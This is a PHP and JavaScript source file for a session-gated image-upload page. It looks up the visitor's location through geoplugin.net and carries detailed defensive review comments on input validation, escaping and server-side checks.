
Current File : D:/crane_image/upload.php

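<?php
// Session bootstrap runs before any markup is emitted: session_start() has to send the
// session cookie header, which fails with "headers already sent" once output has begun
// (unless output buffering happens to be enabled on the server).
session_start();
// Project include; its contents are not shown here (presumably the database connection).
include('db_b.php');
//include('function.php');
?>
<html>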

<div style="display:none;" >
 <?php
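// Look up the visitor's approximate location from the geoplugin.net service.
//
// Security notes:
//  - The response is third-party data fetched over plain HTTP, so it is untrusted input.
//    Calling unserialize() on it without restrictions allows PHP object injection;
//    'allowed_classes' => false limits the decoded result to scalars and arrays.
//  - The address is validated and URL-encoded before it is placed in the request URL.
//  - A short timeout keeps a slow or unreachable lookup service from stalling the page.
// NOTE(review): if the service offers a JSON endpoint over HTTPS, json_decode() on that
// response would remove the unserialize() call entirely - confirm before switching.
$user_ip = getenv('REMOTE_ADDR');
$geo = [];

if (is_string($user_ip) && filter_var($user_ip, FILTER_VALIDATE_IP) !== false) {
    $geo_context = stream_context_create(['http' => ['timeout' => 3]]);
    $geo_raw = file_get_contents(
        'http://www.geoplugin.net/php.gp?ip=' . rawurlencode($user_ip),
        false,
        $geo_context
    );

    if ($geo_raw !== false) {
        $geo_decoded = unserialize($geo_raw, ['allowed_classes' => false]);
        // Anything other than an array (false on a malformed payload, a scalar) is discarded.
        if (is_array($geo_decoded)) {
            $geo = $geo_decoded;
        }
    }
}

// A failed lookup or an unexpected payload yields null here instead of an undefined-key warning.
// These values are attacker-influenceable; HTML-escape them if they are ever printed.
$city = $geo['geoplugin_city'] ?? null;
$region = $geo['geoplugin_regionName'] ?? null;
$country = $geo['geoplugin_countryName'] ?? null;

/*
Keys listed by the original author as available in the service response:
geoplugin_request
geoplugin_status
geoplugin_credit
geoplugin_city
geoplugin_region
geoplugin_areaCode
geoplugin_dmaCode
geoplugin_countryCode
geoplugin_countryName
geoplugin_continentCode
geoplugin_latitude
geoplugin_longitude
geoplugin_regionCode
geoplugin_regionName
geoplugin_currencyCode
geoplugin_currencySymbol
geoplugin_currencySymbol_UTF8
geoplugin_currencyConverter
*/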


?>
</div>

<head>

<title>Upload Image</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!--link rel="icon" href="kvt_con/khalaf_log.jpg" type="image/ico"-->
<link rel="stylesheet" type="text/css" href="main_css/upload.css" />

</head>

<body>
<?php

// Gate the page on a logged-in session: the upload form is only rendered in the else branch.
if(!isset($_SESSION['id'])){
		
// Not logged in: emit a client-side redirect to the login page. The form markup is not
// sent in this case, so the redirect is not the only thing protecting the page.
echo"<script>window.open('login','_self')</script>";

// Logged in: keep the session's user id for the markup below. This else branch stays open
// across the HTML and script that follow and is closed by the last PHP tag before </body>.
// NOTE(review): $my_id is written into a hidden input and later sent back by publish_image()
// as a query parameter; the receiving endpoint should take the user id from $_SESSION rather
// than trusting that client-supplied value - confirm in auto_page.php.
}else{ $my_id = $_SESSION['id']; ?>

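<?php /* The session value is HTML-escaped for the attribute context so that a quote or angle bracket in it cannot break out of value="...". */ ?>
<input type="text" id="my_id" value="<?php echo htmlspecialchars((string) $my_id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" style="display:none;" />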



<div class="create_blog_div">

<div class="login_acc_title" >Upload Image</div>

<div class="login_lebal" >Category</div>
<select id="category_option_output" class="sel_category"></select>

<div class="login_lebal" >Describe Actions</div>
<select id="describe_option_output" class="sel_category"></select>

<div class="login_lebal" >Photo</div>
<div id="" class="select_file_div">

<form method="post" enctype="multipart/form-data" >
<input type="file" id="image_input" onchange="get_file_name();"style="display:none;" />
</form>
<button onClick="document.getElementById('image_input').click();" class="select_file_btn" >Select Photo</button>

<div id="selected_file_name" class="selected_file_name" ></div>
</div>


<div id="new_blog_error_output" class="new_blog_error_output"></div>

<button id="imag_publish_btn1" onClickk="publish_image();"  class="blog_publish_btn" >Publish</button>
<button id="imag_publish_btn2" onClick="publish_image();"  class="blog_publish_btn" style="display:none;background:#2148FA;" >Publish</button>


<div id="display_output"></div>








</div><!--end of login_div-->








<script>


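get_category_option();

/**
 * Fills the category <select> with the option markup returned by
 * auto_page.php?status=disp_category_option.
 *
 * The request is synchronous, as in the original, so the list is populated
 * before the rest of the script runs.
 *
 * The response is inserted as HTML. The endpoint is therefore responsible for
 * HTML-escaping any category names that come from stored data; otherwise stored
 * markup would execute in this page. (auto_page.php is not shown here.)
 */
function get_category_option()
{
	// Local request object: the original assigned to an implicit global that every
	// function in this script overwrote.
	var req = new XMLHttpRequest();
	req.open("get", "auto_page.php?status=disp_category_option", false);
	req.send(null);

	// Only inject a successful response; an error page does not belong inside the <select>.
	if (req.status === 200) {
		document.getElementById('category_option_output').innerHTML = req.responseText;
	}
}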

//////////////////////////////////////////////////////////////////////////////

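get_describe_action_option();

/**
 * Fills the "Describe Actions" <select> with the option markup returned by
 * auto_page.php?status=disp_describe_action_option.
 *
 * The request is synchronous, as in the original. The response is inserted as
 * HTML, so the endpoint must HTML-escape any stored text it returns.
 * (auto_page.php is not shown here.)
 */
function get_describe_action_option()
{
	// Local request object instead of the implicit global used by the original.
	var req = new XMLHttpRequest();
	req.open("get", "auto_page.php?status=disp_describe_action_option", false);
	req.send(null);

	// Only inject a successful response; an error page does not belong inside the <select>.
	if (req.status === 200) {
		document.getElementById('describe_option_output').innerHTML = req.responseText;
	}
}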

/////////////////////////////////////////////////////////////////////////////////////////////

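/**
 * onchange handler for the hidden file input: shows the chosen file's MIME type
 * and switches to the active Publish button when the type is JPEG or PNG.
 *
 * This check is a usability aid only. The type reported by the browser is
 * under the client's control, so the upload endpoint must validate the file
 * itself (content, extension, size) before storing it. (auto_page.php is not
 * shown here.)
 */
function get_file_name()
{
	var name_box = document.getElementById('selected_file_name');
	var active_btn = document.getElementById('imag_publish_btn2');
	var idle_btn = document.getElementById('imag_publish_btn1');

	// files[0] is undefined when the dialog is cancelled; the original dereferenced it anyway.
	var curr_img = document.getElementById('image_input').files[0];
	var supported = !!curr_img && (curr_img.type === "image/jpeg" || curr_img.type === "image/png");

	if (!supported) {
		// Fall back to the inactive button. The original left the active Publish button
		// visible when a valid file had been picked earlier, so a rejected file could
		// still be submitted.
		active_btn.style.display = "none";
		idle_btn.style.display = "block";
		name_box.innerHTML = curr_img
			? "<span style='color:red;'>Image Formate not supported!</span>"
			: "";
		return;
	}

	// textContent: the MIME type is shown as plain text, never parsed as markup.
	name_box.textContent = curr_img.type;
	active_btn.style.display = "block";
	idle_btn.style.display = "none";
}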

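/**
 * Click handler for the active Publish button: validates the three form fields,
 * then POSTs the selected image to auto_page.php (status=insert_new_image) with
 * the user id, category and action in the query string.
 *
 * Security notes for the receiving endpoint (auto_page.php, not shown here):
 *  - my_id is read from a hidden input, so the client can change it. The endpoint
 *    should take the user id from the server-side session instead of this value.
 *  - category_option and describe_option are likewise client-controlled.
 *  - The response body is inserted as HTML below, so the endpoint must not
 *    reflect unescaped request data (file name, parameters) in it.
 */
function publish_image()
{
	var my_id = document.getElementById('my_id').value;
	var category_option = document.getElementById('category_option_output').value;
	var describe_option = document.getElementById('describe_option_output').value;
	var curr_image = document.getElementById('image_input').files[0];

	if (category_option == 'Select Category') { alert('Select Category'); return; }
	if (describe_option == 'Select Action') { alert('Select Action'); return; }
	// The original compared against the string "undefined", which never matches a
	// missing file, so an upload with no image selected was not caught.
	if (!curr_image) { alert('Select Image'); return; }

	var formdata = new FormData();
	formdata.append('image_input', curr_image);

	// Encode each value so characters such as & or # in an option cannot alter the query string.
	var url = "auto_page.php?my_id=" + encodeURIComponent(my_id)
		+ "&category_option=" + encodeURIComponent(category_option)
		+ "&describe_option=" + encodeURIComponent(describe_option)
		+ "&status=insert_new_image";

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.addEventListener("load", completeHandler, false);

	// Synchronous request, as in the original: the load handler runs during send().
	xmlhttp.open("POST", url, false);
	xmlhttp.send(formdata);

	document.getElementById('new_blog_error_output').innerHTML = xmlhttp.responseText;

	// Resets the form after a completed request.
	function completeHandler()
	{
		// "load" also fires for error responses; only report success on a 2xx status.
		// NOTE(review): the endpoint may also signal failures in a 200 body - confirm.
		if (xmlhttp.status < 200 || xmlhttp.status >= 300) {
			return;
		}

		alert("Image Uploaded");
		document.getElementById('imag_publish_btn2').style.display = "none";
		document.getElementById('imag_publish_btn1').style.display = "block";
		document.getElementById('category_option_output').value = "Select Category";
		document.getElementById('describe_option_output').value = "Select Action";
		document.getElementById('selected_file_name').innerHTML = "";
	}
}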




</script>

<?php } ?>
</body>
</html>
